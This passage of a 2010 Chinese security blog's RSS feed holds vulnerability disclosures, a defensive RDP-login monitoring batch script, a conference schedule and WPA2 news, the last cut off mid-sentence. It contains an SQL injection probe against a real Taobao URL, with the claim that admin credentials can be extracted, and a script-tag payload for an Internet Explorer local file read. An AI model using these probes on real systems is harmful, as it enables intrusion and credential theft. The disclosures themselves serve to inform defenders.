<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>大智若鲁&#039;s Blog &#187; 黑客那点事</title>
	<atom:link href="http://www.lzpnb.com/hacker/feed" rel="self" type="application/rss+xml" />
	<link>http://www.lzpnb.com</link>
	<description>----我留在网上的一点痕迹.</description>
	<lastBuildDate>Fri, 10 Sep 2010 13:57:41 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.1</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>淘宝网的一处sql注入漏洞</title>
		<link>http://www.lzpnb.com/archives/1258</link>
		<comments>http://www.lzpnb.com/archives/1258#comments</comments>
		<pubDate>Mon, 23 Aug 2010 14:58:53 +0000</pubDate>
		<dc:creator>大智若鲁</dc:creator>
				<category><![CDATA[黑客那点事]]></category>
		<category><![CDATA[漏洞]]></category>

		<guid isPermaLink="false">http://www.lzpnb.com/archives/1258</guid>
		<description><![CDATA[淘宝网存在一处SQL注入漏洞，可直接获取管理员帐号及密码。
因
http://mm.taobao.com/?id=mm3&#8242;+and+&#8217;1&#8242;%3D&#8217;0

中的id参数过滤不严，导致SQL注入漏洞，但貌似淘宝对数据库的错误机制进行处理，导致网页返回正常页面，但仍可直接通过注入猜解工具直接获取帐号及密码。

漏洞作者： riusksk
]]></description>
			<content:encoded><![CDATA[<p><span style="TEXT-ALIGN: center; WIDOWS: 2; TEXT-TRANSFORM: none; TEXT-INDENT: 0px; BORDER-COLLAPSE: separate; FONT: 12px Verdana, 'Microsoft YaHei', Helvetica, Arial, sans-serif; WHITE-SPACE: normal; ORPHANS: 2; LETTER-SPACING: normal; COLOR: rgb(0,0,0); WORD-SPACING: 0px; -webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; -webkit-text-decorations-in-effect: none; -webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px" class="Apple-style-span"><span style="TEXT-ALIGN: left; LINE-HEIGHT: 25px; FONT-SIZE: 13px" class="Apple-style-span">淘宝网存在一处SQL注入漏洞，可直接获取管理员帐号及密码。</span></span></p>
<p><span style="TEXT-ALIGN: center; WIDOWS: 2; TEXT-TRANSFORM: none; TEXT-INDENT: 0px; BORDER-COLLAPSE: separate; FONT: 12px Verdana, 'Microsoft YaHei', Helvetica, Arial, sans-serif; WHITE-SPACE: normal; ORPHANS: 2; LETTER-SPACING: normal; COLOR: rgb(0,0,0); WORD-SPACING: 0px; -webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; -webkit-text-decorations-in-effect: none; -webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px" class="Apple-style-span"><span style="TEXT-ALIGN: left; LINE-HEIGHT: 25px; FONT-SIZE: 13px" class="Apple-style-span"><span style="TEXT-ALIGN: center; WIDOWS: 2; TEXT-TRANSFORM: none; TEXT-INDENT: 0px; BORDER-COLLAPSE: separate; FONT: 12px Verdana, 'Microsoft YaHei', Helvetica, Arial, sans-serif; WHITE-SPACE: normal; ORPHANS: 2; LETTER-SPACING: normal; COLOR: rgb(0,0,0); WORD-SPACING: 0px; -webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; -webkit-text-decorations-in-effect: none; -webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px" class="Apple-style-span"><span style="TEXT-ALIGN: left; LINE-HEIGHT: 25px; FONT-SIZE: 13px" class="Apple-style-span">因</span></span></span></span></p>
<blockquote><p><strong>http://mm.taobao.com/?id=mm3&#8242;+and+&#8217;1&#8242;%3D&#8217;0</strong></p>
</blockquote>
<p>中的id参数过滤不严，导致SQL注入漏洞，但貌似淘宝对数据库的错误机制进行处理，导致网页返回正常页面，但仍可直接通过注入猜解工具直接获取帐号及密码。</p>
<p><img src="http://www.lzpnb.com/wp-content/uploads/2010/08/zrclip_002p4a819338.png" height="280" width="296"/></p>
<p><span style="TEXT-ALIGN: center; WIDOWS: 2; TEXT-TRANSFORM: none; TEXT-INDENT: 0px; BORDER-COLLAPSE: separate; FONT: 12px Verdana, 'Microsoft YaHei', Helvetica, Arial, sans-serif; WHITE-SPACE: normal; ORPHANS: 2; LETTER-SPACING: normal; COLOR: rgb(0,0,0); WORD-SPACING: 0px; -webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; -webkit-text-decorations-in-effect: none; -webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px" class="Apple-style-span"><span style="TEXT-ALIGN: left" class="Apple-style-span">漏洞作者： riusksk</span></span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.lzpnb.com/archives/1258/feed</wfw:commentRss>
		<slash:comments>23</slash:comments>
		</item>
		<item>
		<title>用批处理监控3389登录</title>
		<link>http://www.lzpnb.com/archives/1238</link>
		<comments>http://www.lzpnb.com/archives/1238#comments</comments>
		<pubDate>Mon, 16 Aug 2010 11:38:49 +0000</pubDate>
		<dc:creator>大智若鲁</dc:creator>
				<category><![CDATA[黑客那点事]]></category>

		<guid isPermaLink="false">http://www.lzpnb.com/archives/1238</guid>
		<description><![CDATA[Neeao&#8217;s Blog ( http://neeao.com/ ) :  朋友一台Windows服务器被黑了，而且还被人恶意删除了一些数据备份，帮其做了下安全加固，考虑到服务器都是通过Windows 终端服务器来管理的，就想办法对其登录做个监控，找了个命令行下发邮件的小工具blat还有批处理，做了个简单的监控程序，功能是当有人通过终端登录且成功后，会向指定的邮箱发送登录者IP地址。
1.先下载blat解压缩到c盘blat目录下面。
2.任意目录新建一个bat文件，我这里是mail.bat,内容如下，

  @echo off
date /t &#38;gt;mail.txt
time /t &#38;gt;&#38;gt;mail.txt
netstat -n -p tcp &#124; find &#34;3389&#34; &#38;gt;&#38;gt;mail.txt
:::::::::::::: config::::::::::::::
set from=Neeao.com@126.com
set user=neeao.com
set pass=neeao.com
set to=neeao.com@qq.com
set subj=3389
set mail=mail.txt
set server=smtp.126.com
set debug=-debug -log blat.log -timestamp
::::::::::::::::: run blat :::::::::::::::::
C:\blat\full\blat.exe %mail% -to %to% -base64 -charset Gb2312 -subject %subj%  -server %server% -f %from% -u %user% -pw %pass% [...]]]></description>
			<content:encoded><![CDATA[<p>Neeao&#8217;s Blog ( http://neeao.com/ ) : <img src="http://www.lzpnb.com/wp-content/uploads/2010/08/zrclip_001p4fcf5f3d.png" style="DISPLAY: inline; FLOAT: right" height="144" width="149"/> <br/>朋友一台Windows服务器被黑了，而且还被人恶意删除了一些数据备份，帮其做了下安全加固，考虑到服务器都是通过Windows 终端服务器来管理的，就想办法对其登录做个监控，找了个命令行下发邮件的小工具blat还有批处理，做了个简单的监控程序，功能是当有人通过终端登录且成功后，会向指定的邮箱发送登录者IP地址。</p>
<p>1.先下载blat解压缩到c盘blat目录下面。</p>
<p>2.任意目录新建一个bat文件，我这里是mail.bat,内容如下，</p>

<div class="wp_syntax"><div class="code"><pre class="html" style="font-family:monospace;">  @echo off
date /t &amp;gt;mail.txt
time /t &amp;gt;&amp;gt;mail.txt
netstat -n -p tcp | find &quot;3389&quot; &amp;gt;&amp;gt;mail.txt
:::::::::::::: config::::::::::::::
set from=Neeao.com@126.com
set user=neeao.com
set pass=neeao.com
set to=neeao.com@qq.com
set subj=3389
set mail=mail.txt
set server=smtp.126.com
set debug=-debug -log blat.log -timestamp
::::::::::::::::: run blat :::::::::::::::::
C:\blat\full\blat.exe %mail% -to %to% -base64 -charset Gb2312 -subject %subj%  -server %server% -f %from% -u %user% -pw %pass% %debug%
start Explorer
   很简单的了，先通过bat查找哪个ip连接到了本机的3389端口，然后邮件发送到指定邮箱。</pre></div></div>

<p>3.进入控制面板&#8212;管理工具&#8212;终端服务器配置&#8212;RDP-Tcp&#8212;属性-环境-用户登录时启用下列程序&#8212;在程序路径和文件名&#8212;写&#8221;C:\mail.bat&#8221;&#8212;起始于&#8212;写&#8221;C:\&#8221;这样就ok了。</p>
<p>4.注销，重新登录，看是否能收到邮件。如果出错的话，桌面出不来的话，可通过ctrl+alt+end来呼出任务管理器来调用桌面。</p>
<p>5.目前发现个小bug，就是登录的时候，会弹出一个cmd的框。</p>
<p>6.如果开通邮箱的短信通知，或者使用139的邮箱，可以达到实时的手机短信通知，有兴趣的可以试试。</p>
]]></content:encoded>
			<wfw:commentRss>http://www.lzpnb.com/archives/1238/feed</wfw:commentRss>
		<slash:comments>10</slash:comments>
		</item>
		<item>
		<title>IE爆出本地文件读取漏洞</title>
		<link>http://www.lzpnb.com/archives/1186</link>
		<comments>http://www.lzpnb.com/archives/1186#comments</comments>
		<pubDate>Wed, 04 Aug 2010 22:50:02 +0000</pubDate>
		<dc:creator>大智若鲁</dc:creator>
				<category><![CDATA[黑客那点事]]></category>

		<guid isPermaLink="false">http://www.lzpnb.com/archives/1186</guid>
		<description><![CDATA[影响版本:

Microsoft Internet Explorer 8.0
Microsoft Internet Explorer 7.0
Microsoft Internet Explorer 6.0

漏洞描述:
微软IE在处理本地文件的访问时存在一些问题，结合微软windows的特性可能可以读取本地的某些特殊文件，可能有其他利用。
作为浏览器不可避免的要处理跨域的资源访问的问题，那么一些本身必须允许跨域的标签如 iframe，script，style，而这些标签又允许解析某些格式的文件，如符合javascript语法的文件，符合css语法的文件，一旦本地存在这些文件又包含了敏感的数据，就允许跨域读取了，微软在访问本地文件时抛出错误（可以被用来判断本地文件是否存在），但是利用windows的特性可以绕过该限制，默认允许的c$哦，win7+ie8测试通过
&#60;*参考
http://www.wooyun.org/bug.php?action=view&#38;id=161
*&#62; 测试方法:
遨游早期的security_id是被存储在本地一个固定位置下的文件下的，通过script可以引用该文件，同时结合一些javascript的上下文就可以获取该security_id从而远程进行各种操作。
&#60;script src=&#8221;\\127.0.0.1\c$\something.js&#8221;&#62;&#60;/script&#62;

厂商补丁：
Microsoft &#8212;&#8212;&#8212; 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
http://www.microsoft.com/windows/ie/default.asp
]]></description>
			<content:encoded><![CDATA[<p><strong><img src="http://www.lzpnb.com/wp-content/uploads/2010/08/zrclip_004n3ff4a968.png" style="DISPLAY: inline; FLOAT: right" height="128" width="136"/>影响版本:</strong></p>
<ul>
<li>Microsoft Internet Explorer 8.0</li>
<li>Microsoft Internet Explorer 7.0</li>
<li>Microsoft Internet Explorer 6.0</li>
</ul>
<p><strong>漏洞描述:</strong></p>
<p>微软IE在处理本地文件的访问时存在一些问题，结合微软windows的特性可能可以读取本地的某些特殊文件，可能有其他利用。</p>
<p>作为浏览器不可避免的要处理跨域的资源访问的问题，那么一些本身必须允许跨域的标签如 iframe，script，style，而这些标签又允许解析某些格式的文件，如符合javascript语法的文件，符合css语法的文件，一旦本地存在这些文件又包含了敏感的数据，就允许跨域读取了，微软在访问本地文件时抛出错误（可以被用来判断本地文件是否存在），但是利用windows的特性可以绕过该限制，默认允许的c$哦，win7+ie8测试通过</p>
<p>&lt;*参考</p>
<p><a href="http://www.wooyun.org/bug.php?action=view&amp;id=161" target="_blank">http://www.wooyun.org/bug.php?action=view&amp;id=161</a></p>
<p>*&gt; <br/><strong>测试方法:</strong></p>
<p>遨游早期的security_id是被存储在本地一个固定位置下的文件下的，通过script可以引用该文件，同时结合一些javascript的上下文就可以获取该security_id从而远程进行各种操作。</p>
<blockquote><p>&lt;script src=&#8221;\\127.0.0.1\c$\something.js&#8221;&gt;&lt;/script&gt;</p>
</blockquote>
<p><strong>厂商补丁：</strong></p>
<p>Microsoft <br/>&#8212;&#8212;&#8212; <br/>目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：</p>
<p><a href="http://www.microsoft.com/windows/ie/default.asp">http://www.microsoft.com/windows/ie/default.asp</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.lzpnb.com/archives/1186/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>焦点峰会XCon2010日程</title>
		<link>http://www.lzpnb.com/archives/1180</link>
		<comments>http://www.lzpnb.com/archives/1180#comments</comments>
		<pubDate>Sat, 31 Jul 2010 16:30:18 +0000</pubDate>
		<dc:creator>大智若鲁</dc:creator>
				<category><![CDATA[黑客那点事]]></category>

		<guid isPermaLink="false">http://www.lzpnb.com/archives/1180</guid>
		<description><![CDATA[
XCon2010会议日程 &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; 2010-8-4 XCon2010 第一天 &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; 时间 演讲者 议题 &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; 07:30 &#8211; 09:00 注册 &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; 09:00 &#8211; 09:10 开幕词 &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; 09:10 &#8211; 10:10 Richard Stallman 软件专利的危害 &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; 10:10 &#8211; 10:30 茶歇 &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; 10:30 &#8211; 11:30 FlashSky 基于数据流SDL的安全测试 &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; 11:30 &#8211; 12:30 刘小珍 AVM2虚拟机逃逸技术研究 &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; 12:30 &#8211; 14:30 午餐 &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; 14:30 &#8211; 15:30 陈小波 &#38; 谢君 [...]]]></description>
			<content:encoded><![CDATA[<p><img src="http://www.lzpnb.com/wp-content/uploads/2010/08/zrclip_001p296c3eab.png" height="84" width="426"/></p>
<p><strong>XCon2010会议日程</strong> <br/><br/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; <br/><br/>2010-8-4 XCon2010 第一天 <br/><br/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; <br/><br/>时间 演讲者 议题 <br/><br/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; <br/><br/>07:30 &#8211; 09:00 注册 <br/><br/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; <br/><br/>09:00 &#8211; 09:10 开幕词 <br/><br/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; <br/><br/>09:10 &#8211; 10:10 Richard Stallman 软件专利的危害 <br/><br/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; <br/><br/>10:10 &#8211; 10:30 茶歇 <br/><br/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; <br/><br/>10:30 &#8211; 11:30 FlashSky 基于数据流SDL的安全测试 <br/><br/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; <br/><br/>11:30 &#8211; 12:30 刘小珍 AVM2虚拟机逃逸技术研究 <br/><br/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; <br/><br/>12:30 &#8211; 14:30 午餐 <br/><br/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; <br/><br/>14:30 &#8211; 15:30 陈小波 &amp; 谢君 绕过windows 7 浏览器内存保护 <br/><br/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; <br/><br/>15:30 &#8211; 16:00 茶歇 <br/><br/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; <br/><br/>16:00 &#8211; 17:00 玩命 虚拟化病毒感染 <br/><br/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; <br/><br/>17:00 &#8211; 18:00 nEINEI 对抗AV检测&#8211;病毒遗传感染技术探索 <br/><br/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; <br/><br/>2010-8-5 XCon2010 第二天 <br/><br/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; <br/><br/>时间 演讲者 议题 <br/><br/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; <br/><br/>09:00 &#8211; 10:00 John Lambert 影响未来开发的9种趋势 <br/><br/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; <br/><br/>10:00 &#8211; 10:30 茶歇 <br/><br/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; <br/><br/>10:30 &#8211; 11:30 于淼 硬件虚拟化下的反调试手段软件保护 <br/><br/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; <br/><br/>11:30 &#8211; 12:30 FunnyWei 深入剖析及挖掘PDF漏洞 <br/><br/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; <br/><br/>12:30 &#8211; 14:30 午餐 <br/><br/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; <br/><br/>14:30 &#8211; 15:30 安天实验室 病毒分析流水线 <br/><br/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; <br/><br/>15:30 &#8211; 16:00 茶歇 <br/><br/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; <br/><br/>16:00 &#8211; 17:00 XCon2010 论坛 <br/><br/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; <br/><br/>17:00 &#8211; 17:20 XCon2010 幸运抽奖 <br/><br/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; <br/><br/>17:20 &#8211; 17:30 闭幕词</p>
<p><a href="http://www.lzpnb.com/archives/1078" target="_blank">Xcon是什么?</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.lzpnb.com/archives/1180/feed</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>WPA2协议爆出0day漏洞</title>
		<link>http://www.lzpnb.com/archives/1149</link>
		<comments>http://www.lzpnb.com/archives/1149#comments</comments>
		<pubDate>Mon, 26 Jul 2010 08:05:04 +0000</pubDate>
		<dc:creator>大智若鲁</dc:creator>
				<category><![CDATA[黑客那点事]]></category>

		<guid isPermaLink="false">http://www.lzpnb.com/archives/1149</guid>
		<description><![CDATA[WPA2协议爆出0day漏洞，&#8221;漏洞196&#8243;意味着内部恶意用户可以伪造数据包危害无线局域网。无线安全研究者称发现了迄今最强的加密验证标准 -WPA2安全协议的漏洞，该漏洞可能会被网络内部的恶意用户利用。来自AirTight Network无线网络安全公司的研究人员将其命名为&#8221;漏洞196&#8243;。这绰号来源则是IEEE 802.11标准（2007版）埋下漏洞的页码。
该公司表示，漏洞196会导致一个类似于中间人的攻击方式：凭借内部授权用户和开源软件，可以在半空中解密其他用户私密数据、注入恶意流量至 网络、危害其它授权设备。 发现该漏洞的研究人员称，由AES衍生出来的WPA2既没有被破解，也没有通过暴力手段而暴露此漏洞。标准里的条款，允许所有客户端使用一个普通共享密匙 接收来自接入点的广播信号，当授权过的用户使用共享密匙传回利用组共享密匙加密的伪造数据包，漏洞便出现了。
根据IEEE 802.11标准第196页，WPA2使用两种密匙：
